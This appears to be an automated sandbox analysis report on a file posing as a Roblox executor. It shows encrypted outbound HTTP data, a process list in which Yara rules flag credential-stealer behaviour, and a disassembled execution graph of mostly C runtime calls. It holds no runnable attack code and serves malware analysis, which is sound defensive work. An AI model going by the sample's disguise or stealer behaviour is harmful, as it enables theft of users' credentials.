                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: 24 8c 31 8a 01 62 d1 26 05 4e 1a 24 04 5a c1 ca 30 eb 1e 6f 4c c6 6c fd b6 c5 77 7d 83 8d ab ed 36 e3 a9 e2 39 9c d6 87 8a ff f6 85 cf 6a 97 f1 c4 79 6a 73 31 72 29 d3 2c 4c 6c c6 80 4d 0e dd 33 67 26 b7 1f 4d 22 6d a4 2d 21 bf a1 45 7e 19 56 86 64 9f c9 84 e1 34 ac cc 28 34 ba d7 0c b1 56 93 da 42 e6 12 cb 8f ff 89 0e 23 60 85 e2 94 42 a1 84 0a 81 66 bd 21 93 8a 0f 32 da 56 f6 b8 6e 9b 2e c5 61 c5 6c 68 45 13 ec 30 e9 28 c0 c6 ec bb a8 59 ca 0b 08 22 67 46 05 dd 25 8f b0 5e 30 ac 38 d9 46 9b 12 5b ab 37 67 28 26 5b c0 dc c0 d8 bf 0e a7 02 1e 7d 11 65 88 22 54 d4 82 74 0b da 46 40 71 f7 7d 3b dc d2 7c 10 45 45 e8 03 b6 63 4f 09 f6 5a c6 6c 7c 0f 93 94 ad 2c 75 9d a6 b0 c8 7f f9 20 a5 b0 03 6d af 8d 05 f3 85 a5 7c 3c 94 cb d0 4b 06 db c6 d5 e6 46 1c bb be
                                                                                        Data Ascii: $1b&N$Z0oLlw}69jyjs1r),LlM3g&M"m-!E~Vd4(4VB#`Bf!2Vn.alhE0(Y"gF%^08F[7g(&[}e"TtF@q};|EEcOZl|,u m|<KF
                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: 98 62 32 91 ea 0d a0 41 63 2a 5b 8d 88 c0 eb ef c4 9d 2d 42 6e 7e f4 6f a6 ee e1 03 ca 7f 67 7d 73 78 b9 f9 43 34 72 6a 34 0e fb f1 00 db e3 11 ca c8 af f8 fc ee a8 3d 6a ba 70 b9 7d 49 ff 31 57 92 5a 60 4a 08 72 8e 24 e5 a0 1b be e5 20 43 d1 07 88 70 1b c9 c2 25 f1 b4 0f 20 a2 6f 8e 50 06 d3 c1 60 5b 15 10 37 38 40 a1 41 49 4a 2b 6b 3f f8 ab 4f 7d ad bd 85 de 54 a0 52 2f 01 b5 13 11 ab fe 23 d8 dd 75 2c d6 da 0f 5c 01 68 14 de 15 c0 91 ee 48 ed 71 d0 79 18 7b 22 b8 4b 5c ec 4d d5 b6 12 3b 36 e8 22 0a ff 22 46 07 08 22 11 36 6a 59 40 ed 08 af b3 6a f4 dd 18 d6 63 c9 4d 9b c8 b0 92 7d 22 d9 7c 35 1f 01 ef c8 51 fd 37 67 39 0f e3 e1 5b 7b 8d 74 b8 de 34 78 1d 90 7e 6d 64 98 8c 60 d7 e7 f4 cc f9 3e 74 7e f2 1e b3 4c 1c c0 f5 07 8f 70 fe ef 60 d1 2b e8 26 9c
                                                                                        Data Ascii: b2Ac*[-Bn~og}sxC4rj4=jp}I1WZ`Jr$ Cp% oP`[78@AIJ+k?O}TR/#u,\hHqy{"K\M;6""F"6jY@jcM}"|5Q7g9[{t4x~md`>t~Lp`+&
                                                                                        2024-12-31 16:23:17 UTC1137INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:23:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=d53t328a3oimps4v9g2an7g788; expires=Sat, 26 Apr 2025 10:09:55 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBfiw34vZVJJ6vvWNYUCU2FUrqR2RxqCgLVjZAMGkCYeOm9f%2Bs8gWsrJPs%2BWnYKdOKpn9NZXuaIVmI0bDDMhPt7jxVnmJWzxK4%2F8ygndqTC6GGGzFlsAovrftVzRAcMchrzNjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9cf18db91a48-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1968&rtt_var=749&sent=346&recv=587&lost=0&retrans=0&sent_bytes=2843&recv_bytes=570423&delivery_rate=1449851&cwnd=157&unsent_bytes=0&cid=8ad3c6a1387fe6ef&ts=2664&x=0"


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:23:04
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                                                                                        Imagebase:0x2f0000
                                                                                        File size:814'592 bytes
                                                                                        MD5 hash:D2B09B1BDA10143724A24534E31D44DB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:11:23:04
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:11:23:05
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                                                                                        Imagebase:0x2f0000
                                                                                        File size:814'592 bytes
                                                                                        MD5 hash:D2B09B1BDA10143724A24534E31D44DB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:11:23:05
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                                                                                        Imagebase:0x2f0000
                                                                                        File size:814'592 bytes
                                                                                        MD5 hash:D2B09B1BDA10143724A24534E31D44DB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:11:23:05
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                                                                                        Imagebase:0x2f0000
                                                                                        File size:814'592 bytes
                                                                                        MD5 hash:D2B09B1BDA10143724A24534E31D44DB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:11:23:05
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                                                                                        Imagebase:0x2f0000
                                                                                        File size:814'592 bytes
                                                                                        MD5 hash:D2B09B1BDA10143724A24534E31D44DB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2093656620.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:8.2%
                                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                                          Signature Coverage:1.1%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:29
                                                                                          execution_graph 18380 2f7020 18385 2f7534 18380->18385 18387 2f7544 18385->18387 18388 2f702a 18385->18388 18387->18388 18392 2f9c35 InitializeCriticalSectionEx 18387->18392 18389 2f7294 18388->18389 18393 2f72a9 18389->18393 18392->18387 18394 2f72bf 18393->18394 18395 2f72b8 18393->18395 18402 300ffb 18394->18402 18399 30106c 18395->18399 18398 2f7034 18400 300ffb std::ios_base::_Init 32 API calls 18399->18400 18401 30107e 18400->18401 18401->18398 18405 30125e 18402->18405 18406 30126a ___scrt_is_nonwritable_in_current_image 18405->18406 18413 301d11 EnterCriticalSection 18406->18413 18408 301278 18414 301082 18408->18414 18410 301285 18424 3012ad 18410->18424 18413->18408 18415 30109d 18414->18415 18416 301110 std::_Locinfo::_Locinfo_dtor 18414->18416 18415->18416 18417 3010f0 18415->18417 18419 30c065 std::ios_base::_Init 32 API calls 18415->18419 18416->18410 18417->18416 18418 30c065 std::ios_base::_Init 32 API calls 18417->18418 18420 301106 18418->18420 18421 3010e6 18419->18421 18422 3056b7 ___free_lconv_mon 14 API calls 18420->18422 18423 3056b7 ___free_lconv_mon 14 API calls 18421->18423 18422->18416 18423->18417 18427 301d28 LeaveCriticalSection 18424->18427 18426 30102c 18426->18398 18427->18426 18541 307600 18544 301d28 LeaveCriticalSection 18541->18544 18543 307607 18544->18543 18930 2f8a60 18931 2f8a82 18930->18931 18935 2f8a97 18930->18935 18936 2f8bf5 18931->18936 18939 2f8c10 18936->18939 18941 2f8c61 18936->18941 18937 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18938 2f8a87 18937->18938 18938->18935 18942 302a79 18938->18942 18940 302ab4 69 API calls 18939->18940 18939->18941 18940->18941 18941->18937 18943 302a84 18942->18943 18944 302a99 18942->18944 18945 301314 __strnicoll 14 API calls 18943->18945 18944->18943 18946 302aa0 18944->18946 18948 302a89 18945->18948 18952 3013c4 18946->18952 18950 3019ff __strnicoll 29 API calls 18948->18950 18949 302aaf 18949->18935 18951 302a94 18950->18951 18951->18935 18953 3013d7 _Fputc 18952->18953 18956 30163d 18953->18956 18955 3013ec _Fputc 18955->18949 18959 301649 ___scrt_is_nonwritable_in_current_image 18956->18959 18957 30164f 18958 301ba8 _Fputc 29 API calls 18957->18958 18961 30166a 18958->18961 18959->18957 18960 301692 18959->18960 18967 2fd13f EnterCriticalSection 18960->18967 18961->18955 18963 30169e 18968 301551 18963->18968 18965 3016b4 18979 3016dd 18965->18979 18967->18963 18969 301564 18968->18969 18970 301577 18968->18970 18969->18965 18982 301478 18970->18982 18972 30159a 18973 301628 18972->18973 18974 3015b5 18972->18974 18986 30c36c 18972->18986 18973->18965 18976 3021e8 ___scrt_uninitialize_crt 64 API calls 18974->18976 18978 3015c8 18976->18978 19000 30c152 18978->19000 19051 2fd153 LeaveCriticalSection 18979->19051 18981 3016e5 18981->18961 18983 301489 18982->18983 18985 3014e1 18982->18985 18983->18985 19003 30c112 18983->19003 18985->18972 18987 30c73e 18986->18987 18988 30c775 18987->18988 18989 30c74d 18987->18989 18990 308e44 _Ungetc 29 API calls 18988->18990 18991 301ba8 _Fputc 29 API calls 18989->18991 18992 30c77e 18990->18992 18999 30c768 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18991->18999 19013 30c170 18992->19013 18995 30c828 19016 30c3c8 18995->19016 18997 30c83f 18997->18999 19028 30c573 18997->19028 18999->18974 19001 30c2b3 _Fputc 31 API calls 19000->19001 19002 30c16b 19001->19002 19002->18973 19004 30c126 _Fputc 19003->19004 19007 30c2b3 19004->19007 19006 30c13b _Fputc 19006->18985 19008 30cdcf _Fputc 29 API calls 19007->19008 19009 30c2c5 19008->19009 19010 30c2e1 SetFilePointerEx 19009->19010 19012 30c2cd _Fputc 19009->19012 19011 30c2f9 GetLastError 19010->19011 19010->19012 19011->19012 19012->19006 19035 30c18e 19013->19035 19017 30c3d7 _Fputc 19016->19017 19018 308e44 _Ungetc 29 API calls 19017->19018 19020 30c3f3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19018->19020 19019 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19021 30c571 19019->19021 19022 30c170 33 API calls 19020->19022 19027 30c3ff 19020->19027 19021->18999 19023 30c453 19022->19023 19024 30c485 ReadFile 19023->19024 19023->19027 19025 30c4ac 19024->19025 19024->19027 19026 30c170 33 API calls 19025->19026 19026->19027 19027->19019 19029 308e44 _Ungetc 29 API calls 19028->19029 19030 30c586 19029->19030 19031 30c170 33 API calls 19030->19031 19034 30c5d0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19030->19034 19032 30c62d 19031->19032 19033 30c170 33 API calls 19032->19033 19032->19034 19033->19034 19034->18999 19036 30c19a ___scrt_is_nonwritable_in_current_image 19035->19036 19037 30c1dd 19036->19037 19039 30c223 19036->19039 19045 30c189 19036->19045 19038 301ba8 _Fputc 29 API calls 19037->19038 19038->19045 19046 30d018 EnterCriticalSection 19039->19046 19041 30c229 19042 30c24a 19041->19042 19043 30c2b3 _Fputc 31 API calls 19041->19043 19047 30c2ab 19042->19047 19043->19042 19045->18995 19045->18997 19045->18999 19046->19041 19050 30d03b LeaveCriticalSection 19047->19050 19049 30c2b1 19049->19045 19050->19049 19051->18981 19099 2fd240 19100 30217a ___scrt_uninitialize_crt 68 API calls 19099->19100 19101 2fd248 19100->19101 19109 307ef2 19101->19109 19103 2fd24d 19119 307f9d 19103->19119 19106 2fd277 19107 3056b7 ___free_lconv_mon 14 API calls 19106->19107 19108 2fd282 19107->19108 19110 307efe ___scrt_is_nonwritable_in_current_image 19109->19110 19123 301d11 EnterCriticalSection 19110->19123 19112 307f75 19128 307f94 19112->19128 19113 307f09 19113->19112 19115 307f49 DeleteCriticalSection 19113->19115 19124 301fd2 19113->19124 19118 3056b7 ___free_lconv_mon 14 API calls 19115->19118 19118->19113 19120 307fb4 19119->19120 19122 2fd25c DeleteCriticalSection 19119->19122 19121 3056b7 ___free_lconv_mon 14 API calls 19120->19121 19120->19122 19121->19122 19122->19103 19122->19106 19123->19113 19125 301fe5 _Fputc 19124->19125 19131 302090 19125->19131 19127 301ff1 _Fputc 19127->19113 19203 301d28 LeaveCriticalSection 19128->19203 19130 307f81 19130->19103 19132 30209c ___scrt_is_nonwritable_in_current_image 19131->19132 19133 3020a6 19132->19133 19134 3020c9 19132->19134 19135 301ba8 _Fputc 29 API calls 19133->19135 19137 3020c1 19134->19137 19142 2fd13f EnterCriticalSection 19134->19142 19135->19137 19137->19127 19138 3020e7 19143 302002 19138->19143 19140 3020f4 19157 30211f 19140->19157 19142->19138 19144 302032 19143->19144 19145 30200f 19143->19145 19147 3021e8 ___scrt_uninitialize_crt 64 API calls 19144->19147 19154 30202a 19144->19154 19146 301ba8 _Fputc 29 API calls 19145->19146 19146->19154 19148 30204a 19147->19148 19149 307f9d 14 API calls 19148->19149 19150 302052 19149->19150 19151 308e44 _Ungetc 29 API calls 19150->19151 19152 30205e 19151->19152 19160 30d116 19152->19160 19154->19140 19156 3056b7 ___free_lconv_mon 14 API calls 19156->19154 19202 2fd153 LeaveCriticalSection 19157->19202 19159 302125 19159->19137 19161 30d13f 19160->19161 19166 302065 19160->19166 19162 30d18e 19161->19162 19164 30d166 19161->19164 19163 301ba8 _Fputc 29 API calls 19162->19163 19163->19166 19167 30d1b9 19164->19167 19166->19154 19166->19156 19168 30d1c5 ___scrt_is_nonwritable_in_current_image 19167->19168 19175 30d018 EnterCriticalSection 19168->19175 19170 30d1d3 19171 30d204 19170->19171 19176 30d076 19170->19176 19189 30d23e 19171->19189 19175->19170 19177 30cdcf _Fputc 29 API calls 19176->19177 19178 30d086 19177->19178 19179 30d08c 19178->19179 19180 30d0be 19178->19180 19182 30cdcf _Fputc 29 API calls 19178->19182 19192 30ce39 19179->19192 19180->19179 19183 30cdcf _Fputc 29 API calls 19180->19183 19184 30d0b5 19182->19184 19185 30d0ca CloseHandle 19183->19185 19186 30cdcf _Fputc 29 API calls 19184->19186 19185->19179 19187 30d0d6 GetLastError 19185->19187 19186->19180 19187->19179 19188 30d0e4 _Fputc 19188->19171 19201 30d03b LeaveCriticalSection 19189->19201 19191 30d227 19191->19166 19193 30ce48 19192->19193 19194 30ceaf 19192->19194 19193->19194 19200 30ce72 19193->19200 19195 301314 __strnicoll 14 API calls 19194->19195 19196 30ceb4 19195->19196 19197 301327 __dosmaperr 14 API calls 19196->19197 19198 30ce9f 19197->19198 19198->19188 19199 30ce99 SetStdHandle 19199->19198 19200->19198 19200->19199 19201->19191 19202->19159 19203->19130 19290 307041 19291 30705c ___scrt_is_nonwritable_in_current_image 19290->19291 19302 301d11 EnterCriticalSection 19291->19302 19293 307063 19303 30cf7a 19293->19303 19296 307081 19322 3070a7 19296->19322 19301 307192 2 API calls 19301->19296 19302->19293 19304 30cf86 ___scrt_is_nonwritable_in_current_image 19303->19304 19305 30cfb0 19304->19305 19306 30cf8f 19304->19306 19325 301d11 EnterCriticalSection 19305->19325 19307 301314 __strnicoll 14 API calls 19306->19307 19309 30cf94 19307->19309 19310 3019ff __strnicoll 29 API calls 19309->19310 19311 307072 19310->19311 19311->19296 19316 3070dc GetStartupInfoW 19311->19316 19312 30cfe8 19333 30d00f 19312->19333 19314 30cfbc 19314->19312 19326 30ceca 19314->19326 19317 3070f9 19316->19317 19319 30707c 19316->19319 19318 30cf7a 30 API calls 19317->19318 19317->19319 19320 307121 19318->19320 19319->19301 19320->19319 19321 307151 GetFileType 19320->19321 19321->19320 19342 301d28 LeaveCriticalSection 19322->19342 19324 307092 19325->19314 19327 3069f4 __strnicoll 14 API calls 19326->19327 19328 30cedc 19327->19328 19332 30cee9 19328->19332 19336 306470 19328->19336 19329 3056b7 ___free_lconv_mon 14 API calls 19331 30cf3e 19329->19331 19331->19314 19332->19329 19341 301d28 LeaveCriticalSection 19333->19341 19335 30d016 19335->19311 19337 30670d std::_Locinfo::_Locinfo_dtor 5 API calls 19336->19337 19338 30648c 19337->19338 19339 3064aa InitializeCriticalSectionAndSpinCount 19338->19339 19340 306495 19338->19340 19339->19340 19340->19328 19341->19335 19342->19324 16673 2fa152 16674 2fa15e ___scrt_is_nonwritable_in_current_image 16673->16674 16699 2f73ba 16674->16699 16676 2fa165 16677 2fa2be 16676->16677 16686 2fa18f ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 16676->16686 16739 2f9a73 IsProcessorFeaturePresent 16677->16739 16679 2fa2c5 16719 2ff179 16679->16719 16684 2fa1ae 16685 2fa22f 16710 3016ec 16685->16710 16686->16684 16686->16685 16722 2ff1c3 16686->16722 16689 2fa235 16714 2f20c0 GetModuleHandleA GetProcAddress FreeConsole 16689->16714 16694 2fa25a 16695 2fa263 16694->16695 16730 2ff1a5 16694->16730 16733 2f73f3 16695->16733 16700 2f73c3 16699->16700 16746 2f96db IsProcessorFeaturePresent 16700->16746 16704 2f73d4 16709 2f73d8 16704->16709 16756 2fd0a0 16704->16756 16707 2f73ef 16707->16676 16709->16676 16711 3016f5 16710->16711 16712 3016fa 16710->16712 16828 301815 16711->16828 16712->16689 17742 2f20b0 16714->17742 16717 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 16718 2f2126 16717->16718 16728 2f9a20 GetModuleHandleW 16718->16728 18153 2ff2c4 16719->18153 16723 2ff1d9 ___scrt_is_nonwritable_in_current_image std::_Locinfo::_Locinfo_dtor 16722->16723 16723->16685 16724 30594a __Getctype 39 API calls 16723->16724 16727 3038fc 16724->16727 16725 301f83 CallUnexpected 39 API calls 16726 303926 16725->16726 16727->16725 16729 2f9a2c 16728->16729 16729->16679 16729->16694 16731 2ff2c4 _unexpected 21 API calls 16730->16731 16732 2ff1b0 16731->16732 16732->16695 16734 2f73ff 16733->16734 16738 2f7415 16734->16738 18226 2fd0b2 16734->18226 16736 2f740d 16737 2fab4e ___scrt_uninitialize_crt 7 API calls 16736->16737 16737->16738 16738->16684 16740 2f9a89 _unexpected std::bad_exception::bad_exception 16739->16740 16741 2f9b34 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16740->16741 16742 2f9b78 _unexpected 16741->16742 16742->16679 16743 2ff18f 16744 2ff2c4 _unexpected 21 API calls 16743->16744 16745 2fa2d3 16744->16745 16747 2f73cf 16746->16747 16748 2fab2f 16747->16748 16765 305386 16748->16765 16751 2fab38 16751->16704 16753 2fab40 16754 2fab4b 16753->16754 16779 3053c2 16753->16779 16754->16704 16819 307a29 16756->16819 16759 2fab4e 16760 2fab57 16759->16760 16761 2fab61 16759->16761 16762 304444 ___vcrt_uninitialize_ptd 6 API calls 16760->16762 16761->16709 16763 2fab5c 16762->16763 16764 3053c2 ___vcrt_uninitialize_locks DeleteCriticalSection 16763->16764 16764->16761 16767 30538f 16765->16767 16768 3053b8 16767->16768 16770 2fab34 16767->16770 16783 30f669 16767->16783 16769 3053c2 ___vcrt_uninitialize_locks DeleteCriticalSection 16768->16769 16769->16770 16770->16751 16771 304411 16770->16771 16800 30f57a 16771->16800 16775 304441 16775->16753 16778 304426 16778->16753 16780 3053ec 16779->16780 16781 3053cd 16779->16781 16780->16751 16782 3053d7 DeleteCriticalSection 16781->16782 16782->16780 16782->16782 16788 30f6fb 16783->16788 16786 30f6a1 InitializeCriticalSectionAndSpinCount 16787 30f68c 16786->16787 16787->16767 16789 30f683 16788->16789 16792 30f71c 16788->16792 16789->16786 16789->16787 16790 30f784 GetProcAddress 16790->16789 16792->16789 16792->16790 16793 30f775 16792->16793 16795 30f6b0 LoadLibraryExW 16792->16795 16793->16790 16794 30f77d FreeLibrary 16793->16794 16794->16790 16796 30f6c7 GetLastError 16795->16796 16797 30f6f7 16795->16797 16796->16797 16798 30f6d2 ___vcrt_FlsFree 16796->16798 16797->16792 16798->16797 16799 30f6e8 LoadLibraryExW 16798->16799 16799->16792 16801 30f6fb ___vcrt_FlsFree 5 API calls 16800->16801 16802 30f594 16801->16802 16803 30f5ad TlsAlloc 16802->16803 16804 30441b 16802->16804 16804->16778 16805 30f62b 16804->16805 16806 30f6fb ___vcrt_FlsFree 5 API calls 16805->16806 16807 30f645 16806->16807 16808 30f660 TlsSetValue 16807->16808 16809 304434 16807->16809 16808->16809 16809->16775 16810 304444 16809->16810 16811 304454 16810->16811 16812 30444e 16810->16812 16811->16778 16814 30f5b5 16812->16814 16815 30f6fb ___vcrt_FlsFree 5 API calls 16814->16815 16816 30f5cf 16815->16816 16817 30f5e7 TlsFree 16816->16817 16818 30f5db 16816->16818 16817->16818 16818->16811 16820 307a39 16819->16820 16821 2f73e1 16819->16821 16820->16821 16823 307192 16820->16823 16821->16707 16821->16759 16824 307199 16823->16824 16825 3071dc GetStdHandle 16824->16825 16826 30723e 16824->16826 16827 3071ef GetFileType 16824->16827 16825->16824 16826->16820 16827->16824 16829 30181e 16828->16829 16832 301834 16828->16832 16829->16832 16834 301756 16829->16834 16831 30182b 16831->16832 16851 301923 16831->16851 16832->16712 16835 301762 16834->16835 16836 30175f 16834->16836 16860 307260 16835->16860 16836->16831 16841 301773 16887 3056b7 16841->16887 16842 30177f 16893 301841 16842->16893 16847 3056b7 ___free_lconv_mon 14 API calls 16848 3017a3 16847->16848 16849 3056b7 ___free_lconv_mon 14 API calls 16848->16849 16850 3017a9 16849->16850 16850->16831 16852 301994 16851->16852 16855 301932 16851->16855 16852->16832 16853 305801 WideCharToMultiByte _Fputc 16853->16855 16854 3069f4 __strnicoll 14 API calls 16854->16855 16855->16852 16855->16853 16855->16854 16857 301998 16855->16857 16859 3056b7 ___free_lconv_mon 14 API calls 16855->16859 17461 30ca45 16855->17461 16856 3056b7 ___free_lconv_mon 14 API calls 16856->16852 16857->16856 16859->16855 16861 301768 16860->16861 16862 307269 16860->16862 16866 30c96e GetEnvironmentStringsW 16861->16866 16915 305a05 16862->16915 16867 30c986 16866->16867 16868 30176d 16866->16868 16869 305801 _Fputc WideCharToMultiByte 16867->16869 16868->16841 16868->16842 16870 30c9a3 16869->16870 16871 30c9b8 16870->16871 16872 30c9ad FreeEnvironmentStringsW 16870->16872 16873 3056f1 __strnicoll 15 API calls 16871->16873 16872->16868 16874 30c9bf 16873->16874 16875 30c9c7 16874->16875 16876 30c9d8 16874->16876 16877 3056b7 ___free_lconv_mon 14 API calls 16875->16877 16878 305801 _Fputc WideCharToMultiByte 16876->16878 16879 30c9cc FreeEnvironmentStringsW 16877->16879 16880 30c9e8 16878->16880 16879->16868 16881 30c9f7 16880->16881 16882 30c9ef 16880->16882 16884 3056b7 ___free_lconv_mon 14 API calls 16881->16884 16883 3056b7 ___free_lconv_mon 14 API calls 16882->16883 16885 30c9f5 FreeEnvironmentStringsW 16883->16885 16884->16885 16885->16868 16888 3056c2 RtlFreeHeap 16887->16888 16889 301779 16887->16889 16888->16889 16890 3056d7 GetLastError 16888->16890 16889->16831 16891 3056e4 __dosmaperr 16890->16891 16892 301314 __strnicoll 12 API calls 16891->16892 16892->16889 16894 301856 16893->16894 16895 3069f4 __strnicoll 14 API calls 16894->16895 16896 30187d 16895->16896 16897 301885 16896->16897 16912 30188f 16896->16912 16898 3056b7 ___free_lconv_mon 14 API calls 16897->16898 16914 301786 16898->16914 16899 3018ec 16900 3056b7 ___free_lconv_mon 14 API calls 16899->16900 16900->16914 16901 3069f4 __strnicoll 14 API calls 16901->16912 16902 3018fb 17451 3017e6 16902->17451 16906 3056b7 ___free_lconv_mon 14 API calls 16908 301908 16906->16908 16907 301916 17457 301a2c IsProcessorFeaturePresent 16907->17457 16911 3056b7 ___free_lconv_mon 14 API calls 16908->16911 16909 3056b7 ___free_lconv_mon 14 API calls 16909->16912 16911->16914 16912->16899 16912->16901 16912->16902 16912->16907 16912->16909 17442 30532c 16912->17442 16913 301922 16914->16847 16916 305a10 16915->16916 16917 305a16 16915->16917 16965 306374 16916->16965 16922 305a1c 16917->16922 16970 3063b3 16917->16970 16921 305a34 16975 3069f4 16921->16975 16925 305a21 16922->16925 16987 301f83 16922->16987 16943 307621 16925->16943 16928 305a48 16930 3063b3 __strnicoll 6 API calls 16928->16930 16929 305a5d 16931 3063b3 __strnicoll 6 API calls 16929->16931 16932 305a54 16930->16932 16933 305a69 16931->16933 16938 3056b7 ___free_lconv_mon 14 API calls 16932->16938 16934 305a7c 16933->16934 16935 305a6d 16933->16935 16982 305c5c 16934->16982 16936 3063b3 __strnicoll 6 API calls 16935->16936 16936->16932 16940 305a5a 16938->16940 16940->16922 16941 3056b7 ___free_lconv_mon 14 API calls 16942 305a8e 16941->16942 16942->16925 16944 30764b 16943->16944 17260 3074ad 16944->17260 16947 307664 16947->16861 16950 30768b 17274 3072a8 16950->17274 16951 30767d 16952 3056b7 ___free_lconv_mon 14 API calls 16951->16952 16952->16947 16955 3076c3 16956 301314 __strnicoll 14 API calls 16955->16956 16958 3076c8 16956->16958 16957 30770a 16960 307753 16957->16960 17285 3079dc 16957->17285 16961 3056b7 ___free_lconv_mon 14 API calls 16958->16961 16959 3076de 16959->16957 16962 3056b7 ___free_lconv_mon 14 API calls 16959->16962 16964 3056b7 ___free_lconv_mon 14 API calls 16960->16964 16961->16947 16962->16957 16964->16947 16998 30670d 16965->16998 16968 306399 16968->16917 16969 3063ab TlsGetValue 16971 30670d std::_Locinfo::_Locinfo_dtor 5 API calls 16970->16971 16972 3063cf 16971->16972 16973 305a30 16972->16973 16974 3063ed TlsSetValue 16972->16974 16973->16921 16973->16922 16980 306a01 __strnicoll 16975->16980 16976 306a41 17016 301314 16976->17016 16977 306a2c HeapAlloc 16978 305a40 16977->16978 16977->16980 16978->16928 16978->16929 16980->16976 16980->16977 17013 2ff4ab 16980->17013 17053 305dc2 16982->17053 17155 307ae0 16987->17155 16990 301f93 16992 301f9d IsProcessorFeaturePresent 16990->16992 16997 301fbc 16990->16997 16993 301fa9 16992->16993 17185 301a60 16993->17185 16994 2ff18f _unexpected 21 API calls 16996 301fc6 16994->16996 16997->16994 16999 30673d 16998->16999 17002 306390 16998->17002 16999->17002 17005 306642 16999->17005 17002->16968 17002->16969 17003 306757 GetProcAddress 17003->17002 17004 306767 std::_Locinfo::_Locinfo_dtor 17003->17004 17004->17002 17011 306653 ___vcrt_FlsFree 17005->17011 17006 3066e9 17006->17002 17006->17003 17007 306671 LoadLibraryExW 17008 3066f0 